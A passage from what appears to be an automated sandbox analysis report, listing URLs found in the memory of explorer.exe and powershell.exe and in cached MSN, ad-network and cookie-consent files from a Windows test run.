Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.4.dr String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.4.dr String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.4.dr String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.4.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.4.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.4.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.4.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: iab2Data[1].json.5.dr String found in binary or memory: https://bealion.com/politica-de-cookies
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: iab2Data[1].json.5.dr String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.5.dr String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
Source: de-ch[1].htm.5.dr String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.5.dr String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
Source: de-ch[1].htm.5.dr String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
Source: ~DFFF48C403F4BCBE81.TMP.4.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ~DFFF48C403F4BCBE81.TMP.4.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DFFF48C403F4BCBE81.TMP.4.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.5.dr String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: iab2Data[1].json.5.dr String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.5.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1611307343&amp;rver
Source: de-ch[1].htm.5.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1611307343&amp;rver=7.0.6730.0&am
Source: de-ch[1].htm.5.dr String found in binary or memory: https://login.live.com/logout.srf?ct=1611307344&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
Source: de-ch[1].htm.5.dr String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1611307343&amp;rver=7.0.6730.0&amp;w
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.5.dr String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.5.dr String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.5.dr String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: iab2Data[1].json.5.dr String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.5.dr String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.5.dr String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DFFF48C403F4BCBE81.TMP.4.dr String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.5.dr String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
Source: de-ch[1].htm.5.dr String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
Source: de-ch[1].htm.5.dr String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
Source: imagestore.dat.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYZkP.img?h=368&amp
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
Source: de-ch[1].htm.5.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.5.dr String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.5.dr String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.5.dr String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFFF48C403F4BCBE81.TMP.4.dr String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000024.00000000.981670591.000000000A897000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpt
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/aus-angst-vor-mutierten-viren-maskenpflicht-f%c3%bcr-z%c3%bcrch
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/auto-der-milit%c3%a4rpolizei-kollidiert-mit-tram/ar-BB1cZe9U?oc
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/die-stadt-z%c3%bcrich-schnappt-sich-einen-begehrten-kita-stando
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/feuerwehr-sperrt-teile-der-altstadt-wegen-dachlawinen/ar-BB1cXQ
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/ich-habe-mehrere-kritische-man%c3%b6ver-mit-autofahrern-erlebt/
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/in-schwamendingen-soll-die-gr%c3%b6sste-z%c3%bcrcher-schulanlag
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/kommentar-es-braucht-keine-staatlichen-kitas-in-der-stadt-z%c3%
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/nach-dem-flockdown-parkpl%c3%a4tze-dienen-der-stadt-z%c3%bcrich
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/nach-razzia-gegen-mutmassliche-neonazis-rechtsextreme-junge-tat
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/twitter-sperrt-accounts-von-svp-kantonsrat-claudio-schmid/ar-BB
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
Source: de-ch[1].htm.5.dr String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
